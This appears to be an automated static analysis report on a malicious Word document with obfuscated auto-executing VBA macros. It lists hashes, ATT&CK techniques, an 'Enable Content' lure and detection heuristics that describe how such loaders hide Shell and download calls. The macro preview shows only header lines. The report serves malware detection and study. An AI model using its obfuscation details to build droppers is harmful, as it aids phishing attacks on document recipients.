Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 652e7cb06487cc63…

MALICIOUS

Office (OLE)

Size: 208.5 KB
Created: 2018-09-18 06:08:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 2409e1bd2ccecb638d2da168c461354b
SHA-1: 521448ec79cc85d505f8897d4b8535a4c300227a
SHA-256: 652e7cb06487cc63f7d037c56a7d37f6b672a0e228fc8395d27885cb9353aff8
Risk Score: 322

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1071.001 Web Protocols

The sample is a malicious Office document containing obfuscated VBA macros. The document body explicitly instructs the user to 'Enable Content', a common lure for macro-based malware. The VBA macros contain a Shell() call, indicating execution of external commands, and are heavily obfuscated, suggesting a downloader or dropper functionality. The presence of a VBA auto-execution loader and the Shell() call strongly suggest the execution of a second-stage payload.

Heuristics (9)

  • ClamAV: Doc.Malware.Generic-6923090-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Generic-6923090-0
  • VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure (medium, SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 144765 bytes
SHA-256: 2fbf02eb375078e5bc39c52fdffb264b18780c5b2fb72339ef5e7c8fb09e2a8d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
... (truncated)